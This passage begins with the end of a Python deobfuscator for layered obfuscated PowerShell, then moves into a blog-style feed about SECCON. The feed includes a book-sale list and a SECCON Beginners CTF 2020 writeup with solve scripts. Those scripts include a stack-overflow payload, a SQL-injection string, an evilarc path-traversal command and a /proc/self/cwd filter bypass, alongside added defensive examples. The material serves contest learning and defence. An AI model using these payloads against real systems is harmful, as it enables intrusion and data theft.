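    "$ECCON+=[char](95127/857); .([ScriptBlock]::Create($ECCON))"
)
LAYER2_B64 = "YkwRUxVXQ05DQ1NOE1sVVU4T"   # first 24 characters of $text
LAYER2_KEY = "hhjhhjhjkjhjhf"             # $f as recovered in the write-up
LAYER3 = (  # first 16 terms of the [CHar] chain plus its trailing pipe
    "[CHar]36+[CHar]69+[CHar]67+[CHar]67+[CHar]79+[CHar]78+[CHar]61+"
    "[CHar]82+[CHar]101+[CHar]97+[CHar]100+[CHar]45+[CHar]72+[CHar]111+"
    "[CHar]115+[CHar]116|iex"
)

CHAR_EXPR = re.compile(r"\[char\]\(\s*(-?\d+)\s*([-+*/])\s*(-?\d+)\s*\)", re.I)
CHAR_LIT = re.compile(r"\[char\](\d+)", re.I)
SINKS = re.compile(r"\[ScriptBlock\]::Create|\bInvoke-Expression\b|\biex\b", re.I)


def _arith(a, op, b):
    """Evaluate one integer operation; script text is never passed to eval()."""
    if op == "+":
        return a + b
    if op == "-":
        return a - b
    if op == "*":
        return a * b
    if b == 0 or a % b:
        raise ValueError(f"non-integer character code: {a}/{b}")
    return a // b


def decode_char_exprs(script):
    """Layer 1: join every [char](A op B) term into the hidden text."""
    return "".join(chr(_arith(int(a), op, int(b)))
                   for a, op, b in CHAR_EXPR.findall(script))


def xor_layer(b64_text, key):
    """Layer 2: Base64-decode, then XOR with the repeating key (index i mod len)."""
    data = base64.b64decode("".join(b64_text.split()))
    k = key.encode("ascii")
    plain = bytes(c ^ k[i % len(k)] for i, c in enumerate(data))
    return plain.decode("ascii", "replace")


def decode_char_literals(script):
    """Layer 3: join every [CHar]N term."""
    return "".join(chr(int(n)) for n in CHAR_LIT.findall(script))


def find_sinks(script):
    """Report where a layer would execute its decoded string."""
    return [m.group(0) for m in SINKS.finditer(script)]


if __name__ == "__main__":
    print(repr(decode_char_exprs(LAYER1)), find_sinks(LAYER1))
    print(repr(xor_layer(LAYER2_B64, LAYER2_KEY)))
    print(repr(decode_char_literals(LAYER3)), find_sinks(LAYER3))
```

The second result reproduces the start of the symbol-named script shown in the write-up, which confirms the key and the `i mod len(key)` indexing of the original nested loop.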
Text
Microsoft publishes SECCON framework for securing Windows 10
Source: https://www.zdnet.com/article/microsoft-publishes-seccon-framework-for-securing-windows-10/
More info: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-security-configuration-framework/windows-security-configuration-framework
6 notes
Text
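Tatsujin Publishing sale
Tatsujin Publishing was running a huge half-price-everything sale, so I looked through all of it and made a list of the ones that looked good. But the books I bought... I have to actually read them...
https://tatsu-zine.com/books/
=======================================
[Half price] Correlation Coefficients
https://tatsu-zine.com/books/correlation-coefficient
Something like a dictionary of correlation coefficients? Looks interesting
[Half price] Getting Started with OpenGL in Rust
https://tatsu-zine.com/books/rust-opengl
Hmm, I'm interested in WebGL, so maybe it would be good to read this one first?
Programming English Textbook
https://tatsu-zine.com/books/programming-english-textbook
I'm always unsure how to write comments and commits...
[Half price] The Universal Computer: The Road from Leibniz to Turing
https://tatsu-zine.com/books/universal-computer
I like this kind of book. I know the other six of course, but Cantor is a name I have never heard
[Half price] The Origins of Computer Theory [Volume 1]: Turing
https://tatsu-zine.com/books/origin-computer-theory1
This looks good! Only Volume 1 exists, huh... Glad it comes with commentary. It comes up right away if you google it, but I wish they had included the original text and not just the translation. I might want this one on paper, but I'll think about that after buying it if I still want it
Principles of Unicage
https://tatsu-zine.com/books/unicage-genron
Religion
[Half price] Practical Natural Language Processing Series, Volume 6: How to Build a Word-of-Mouth Analysis System
https://tatsu-zine.com/books/anlp-kuchikomi
Kind of close to my work and kind of not; I kind of want to read it and kind of don't...
The Art of Software Testing, 2nd Edition
https://tatsu-zine.com/books/the-art-of-software-testing
The print edition is from 2006, huh... Maybe a bit old
[Half price] Stocks and Python: A Book for Aiming to Make Money with Your Own Programs
https://tatsu-zine.com/books/stock-and-python
I have a relative whose hobby is stocks, but I can't really keep up with the conversation, so studying with this might be fun
[Half price] Introduction to Graph Theory (4th edition of the original)
https://tatsu-zine.com/books/introduction-to-graph-theory-4ed
The original is from 2018, so it looks good. In my third year of university I seriously had no money and didn't buy the textbook, so I don't own a single graph theory book...
How to Read and Write Specifications
https://tatsu-zine.com/books/reading-writing-specification
I always write them haphazardly, so maybe I should read a book on it at least once... At 147 pages I don't think it's that thick
[Half price] Introduction to Building Static Sites with Hugo: Making Your Own Site with a Static Site Generator
https://tatsu-zine.com/books/hugo-ssg
I was thinking it might be nice to quit Tumblr and use Hugo, and it's a 2021 book, so it looks good
[Half price] The Truth About the Capacity Market: A Detailed Analysis of the Failure of the First Auction
https://tatsu-zine.com/books/youryou-shijou
Capacity market is a term I'm hearing for the first time
Garbage Collection Algorithms and Implementation
https://tatsu-zine.com/books/gcbook
It's cheap and looks good, but I still haven't managed to read the Shoeisha one
[Half price] Game Development with Rust + ECS: A Recommendation of the Amethyst Game Engine
https://tatsu-zine.com/books/rust-ecs-amethyst
Amethyst is from the rust game-dev group, so I've seen it many times but never used it. Compared with bevy-engine and the like it felt a bit heavyweight and that was a hurdle, so reading a book on it sounds interesting
[Half price] A Book for People Who Want to Start Chisel
https://tatsu-zine.com/books/begging-chisel
I've long wanted to try Chisel but had never seen consolidated information, so I was happy to learn for the first time that a book exists. I'm curious
[Half price] Fundamentals of Graph and Network Algorithms: Mathematics and C Programs
https://tatsu-zine.com/books/graph-network-algorithms-no-kiso
The one listed above is probably better than this one. I'd like a standard one. Also, the really standard ones I want on paper after all
Security Contest Challenge Book
https://tatsu-zine.com/books/seccon-challengebook
Security Contests in Depth
https://tatsu-zine.com/books/ctfbook
[Half price] Pwnable Explained: Take on Security Contests!
https://tatsu-zine.com/books/pwnable
I've never done CTF. I want to try! But I feel like there's some standard introductory book
Learning from a Kaggle Grandmaster: A Practical Approach to Machine Learning
https://tatsu-zine.com/books/kaggle-grandmaster-ml
Kaggle Competition Challenge Book
https://tatsu-zine.com/books/kaggle-ml
Kaggle has been going up in flames lately, which is amusing, so maybe I could try it a bit again after a long while
[Half price] World-Standard MIT Textbook, Strang: Introduction to Linear Algebra, 4th Edition
https://tatsu-zine.com/books/introduction-to-linear-algebra-4ed
This one has a good reputation; there were reviews saying the translation is bad too, but I get the feeling it isn't that terrible...?
[Half price] World-Standard MIT Textbook | Strang: Linear Algebra and Data Science
https://tatsu-zine.com/books/linear-algebra-and-data-science
This one's translation has a terrible reputation
[Half price] World-Standard MIT Textbook | Strang: Differential Equations and Linear Algebra
https://tatsu-zine.com/books/differential-equations-and-linear-algebra
This one's translation also has a terrible reputation
[Half price] World-Standard MIT Textbook: Introduction to Programming Using Python, 2nd Edition, Data Science and Applications
https://tatsu-zine.com/books/python-programming-introduction-2ed
[Half price] World-Standard MIT Textbook: Introduction to Programming Using Python
[Half price] Sedgewick: Algorithms in C, Parts 1-4: Fundamentals, Data Structures, Sorting, Searching
https://tatsu-zine.com/books/algorithm-c-1-4
https://tatsu-zine.com/books/python-programming-introduction
A bargain, but I'm not that interested
[Half price] The Technology Behind Card Game Production
https://tatsu-zine.com/books/cardgame-development
This looks a bit interesting and I can't help being curious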
0 notes
Quote
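Favorite tweets: ~Japan's largest CTF contest, attracting attention from a wide range of industries~ Security contest "SECCON CTF" to be held Saturday, December 11 to Sunday, December 12 https://t.co/z9gkIwXH8y There's a total prize pool of 1 million too, but there's Capture The Packet!! — ほよたか (@takahoyo) Nov 19, 2021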
http://twitter.com/takahoyo
0 notes
Photo

🤣🤣🤣🤣Brenda Beatriz Maluca Ramos Seccon... https://www.instagram.com/p/CVsQZ6krRxgPIWZNJjMk9d0doQIrHV2qoNHBD80/?utm_medium=tumblr
0 notes
Text
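The technology behind monitoring and operations for SECCON Beginners CTF 2020 - ポン酢ブログ(β) [Hatena Bookmark]
The technology behind monitoring and operations for SECCON Beginners CTF 2020 - ポン酢ブログ(β)
This is @atpons from LifeMemoryTeam. Did you enjoy this SECCON Beginners CTF 2020? I worked on operations and infrastructure setup. Here I'll write about how I built the monitoring and operations parts that I was in charge of. Liveness monitoring Badges This time, for participants, we attached badges like this to the challenges and pro...
from kjw_junichi's Hatena Bookmark https://ift.tt/2ZuZ1y6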
0 notes
Text
SECCON Beginners CTF 2020 writeup
I don't really know what a writeup is, but I'll try writing something like one. My CTF experience: this is my second time, the first since ctf4b in 2018.
Welcome
Just enter the flag posted on Discord.
Spy
When I tried entering names from the list, sometimes the response came back instantly and sometimes it took about 1 second. Collect the ones that take 1 second (it probably takes time for encryption or something) and check them, and that's it.
R&B
If there's an R at the head, do the reverse of ROT13; if there's a B at the head, do a Base64 decode. It had been a while since I wrote Python, and it was my first time with Python 3, so I got confused by the type conversion between bytes and str.

    import base64

    flag = b'BQlVrOUllRGxXY2xGNVJuQjRkVFZ5U0VVMGNVZEpiRVpTZVZadmQwOWhTVEIxTkhKTFNWSkdWRUZIUlRGWFUwRklUVlpJTVhGc1NFaDFaVVY1Ukd0Rk1qbDFSM3BuVjFwNGVXVkdWWEZYU0RCTldFZ3dRVmR5VVZOTGNGSjFTMjR6VjBWSE1rMVRXak5KV1hCTGVYZEplR3BzY0VsamJFaGhlV0pGUjFOUFNEQk5Wa1pIVFZaYVVqRm9TbUZqWVhKU2NVaElNM0ZTY25kSU1VWlJUMkZJVWsxV1NESjFhVnBVY0d0R1NIVXhUVEJ4TmsweFYyeEdNVUUxUlRCNVIwa3djVmRNYlVGclJUQXhURVZIVGpWR1ZVOVpja2x4UVZwVVFURkZVblZYYmxOaWFrRktTVlJJWVhsTFJFbFhRVUY0UlZkSk1YRlRiMGcwTlE9PQ=='

    def b64decode(s):
        return base64.b64decode(s)

    def rrot13(s):
        # Shift each ASCII letter back by 13, wrapping within its own case.
        def f(x):
            ch = x
            if ord('a') <= ch and ch <= ord('z'):
                ch = ch - 13
                if ch < ord('a'):
                    ch += ord('z') - ord('a') + 1
            elif ord('A') <= ch and ch <= ord('Z'):
                ch = ch - 13
                if ch < ord('A'):
                    ch += ord('Z') - ord('A') + 1
            return ch
        return bytes([f(x) for x in s])

    # Peel one layer per iteration: the first byte names the encoding of the rest.
    while True:
        print(flag, flag[0])
        if flag[0] == ord(b'B'):
            flag = b64decode(flag[1:])
        elif flag[0] == ord(b'R'):
            flag = rrot13(flag[1:])
        else:
            # Neither prefix: no layers are left, so stop.
            print("unknown")
            exit()
mask
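Disassembling with Ghidra showed that it ANDs the FLAG one character at a time against two bitmasks and checks whether each result becomes the expected string. Combining the information from the two bitmasks lets you restore the original FLAG, so restore it.

    package main

    import (
        "fmt"
    )

    func main() {
        // Expected results of FLAG & m1 and FLAG & m2, taken from the binary.
        k1 := "atd4`qdedtUpetepqeUdaaeUeaqau"
        k2 := "c`b bk`kj`KbababcaKbacaKiacki"
        m1 := byte(0x75)
        m2 := byte(0xeb)
        for i := 0; i < len(k1); i++ {
            var b byte
            // m1 | m2 == 0xff, so the two masked values cover every bit.
            b = (k1[i] & m1) | (k2[i] & m2)
            fmt.Printf("%c", b)
        }
    }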
Beginner's Stack
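I filled it in roughly and was told "RSP is misaligned!". I didn't really know what to do, but adding +1 to the address of the function to jump to made it work (I don't really get it...).

    from socket import *
    from struct import *
    from time import sleep
    from telnetlib import Telnet  # telnetlib was removed from the standard library in Python 3.13

    s = socket(AF_INET, SOCK_STREAM)
    s.connect(("bs.quals.beginners.seccon.jp", 9001))
    # 40 bytes of padding, then the address to jump to (already +1, as described above).
    s.send(b'\x00\x00\x00\x00\x00\x00\x00\x00'*5+b'\x62\x08\x40\x00\x00\x00\x00\x00\x00')
    # Hand the connected socket to Telnet for an interactive session.
    t = Telnet()
    t.sock = s
    t.interact()

When I googled, someone was using something called telnetlib, so I copied that. I thought Python's standard library is rich and amazing.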
readme
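The constraints are that it must be a path from / and must not contain the string ctf. At first I thought I could get around it with escape sequences or the like and tried, but it didn't work. After that I found that a relative path via /proc/self/cwd works. The current directory can be obtained from PWD in /proc/self/environ.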
emoemoencode
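Given the flag format it's ctf{xxx}, so assume the first character corresponds to c and do a Caesar decryption.

    s = "🍣🍴🍦🌴🍢🍻🍳🍴🍥🍧🍡🍮🌰🍧🍲🍡🍰🍨🍹🍟🍢🍹🍟🍥🍭🌰🌰🌰🌰🌰🌰🍪🍩🍽"
    ss = ""
    for c in s:
        # 127843 is the code point of the first emoji, which maps to 'c'.
        d = ord(c)-127843+ord('c')
        print(ord(c), chr(d))
        ss += chr(d)
    print(ss)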
Tweetstore
' is encoded as \', but if you input \' it becomes \\', so you can close the single quote. Then ignore the rest of the query with a comment: putting \' UNION select user, user, now() -- into the search word solves it.
unzip
https://github.com/ptoomey3/evilarc I made a directory traversal zip with this and it worked.

    python evilarc.py flag.txt --depth 7 --os unix
sneaky
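Disassembling with Ghidra, the source was complicated and I didn't really understand it. While clicking around at random, there was a place that seemed to be outputting GAMEOVER, and near it there was code comparing against the constant 10000. Thinking 10000 might be the high-score threshold, I rewrote the executable in a binary editor to make it 0. 10000 (0x0f27) appears in 4 places; rewriting only one didn't work, and after rewriting all of them, just picking up one item was enough.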
0 notes
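The readme and unzip sections of the writeup above both come down to a path being judged by its spelling instead of by where it resolves. The following is an added example, not part of the original post or of the challenge source: it puts the substring check next to a check that canonicalises first, and applies the same containment test to zip entry names. The directory layout, the `/cwd` symlink standing in for `/proc/self/cwd`, and all function names are assumptions made for the demonstration.

```python
import io
import os
import tempfile
import zipfile

def inside(base: str, target: str) -> bool:
    """True if target, with symlinks and '..' resolved, is base or lies under it."""
    base, target = os.path.realpath(base), os.path.realpath(target)
    return os.path.commonpath([base, target]) == base

def naive_allowed(path: str) -> bool:
    # readme: the check as the writeup describes it (absolute path, no "ctf").
    return path.startswith("/") and "ctf" not in path

def hardened_allowed(path: str, root: str) -> bool:
    # readme: canonicalise first, then require the result to stay in <root>/public.
    return path.startswith("/") and inside(
        os.path.join(root, "public"), os.path.join(root, path.lstrip("/")))

def unsafe_members(zf: zipfile.ZipFile, dest: str) -> list:
    # unzip: entry names that would be written outside dest if extracted as named.
    return [info.filename for info in zf.infolist()
            if not inside(dest, os.path.join(dest, info.filename))]

def demo() -> dict:
    out = {}
    with tempfile.TemporaryDirectory() as root:
        # Constructed layout under a temporary root (hypothetical names):
        # /home/ctf is secret, /public is readable, /cwd -> /home/ctf.
        os.makedirs(os.path.join(root, "home", "ctf"))
        os.makedirs(os.path.join(root, "public"))
        os.symlink(os.path.join(root, "home", "ctf"), os.path.join(root, "cwd"))
        for p in ("/home/ctf/flag.txt", "/cwd/flag.txt", "/public/hello.txt"):
            out[p] = (naive_allowed(p), hardened_allowed(p, root))
        # Constructed archive: one ordinary entry and one seven-level traversal entry.
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr("notes/readme.txt", "ok")
            zf.writestr("../" * 7 + "flag.txt", "x")
        with zipfile.ZipFile(buf) as zf:
            out["zip"] = unsafe_members(zf, os.path.join(root, "public"))
    return out

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Each tuple is (substring check, canonicalising check); only the symlinked path passes the first while failing the second.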
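The Spy section of the writeup above separates valid names from invalid ones by response time alone. As an added example (not code from the post or from the challenge), here is a login handler that skips the password hash for unknown names next to one that always does the same amount of work. That the slow step is a password KDF is an assumption, as are the user store, salt, iteration count and function names; the difference is measured as a count of KDF runs so the result is deterministic.

```python
import hashlib
import hmac

ITERATIONS = 20_000          # constructed work factor, kept low for the demo
SALT = b"constructed-salt"   # constructed; real systems use a per-user random salt
calls = 0                    # number of KDF runs, the stand-in for response time

def kdf(password: str) -> bytes:
    global calls
    calls += 1
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, ITERATIONS)

USERS = {"alice": kdf("correct horse")}   # hypothetical user store
DUMMY = kdf("placeholder")                # hash compared against for unknown names

def login_leaky(user: str, password: str) -> bool:
    if user not in USERS:
        return False                      # early return: unknown names answer faster
    return hmac.compare_digest(USERS[user], kdf(password))

def login_uniform(user: str, password: str) -> bool:
    stored = USERS.get(user, DUMMY)       # always hash, even for unknown names
    matches = hmac.compare_digest(stored, kdf(password))
    return matches and user in USERS      # a match on DUMMY never logs anyone in

def kdf_runs(login, user: str) -> int:
    """How many KDF runs one failed attempt for this user costs."""
    before = calls
    login(user, "wrong guess")
    return calls - before

if __name__ == "__main__":
    for fn in (login_leaky, login_uniform):
        print(fn.__name__, kdf_runs(fn, "alice"), kdf_runs(fn, "bob"))
```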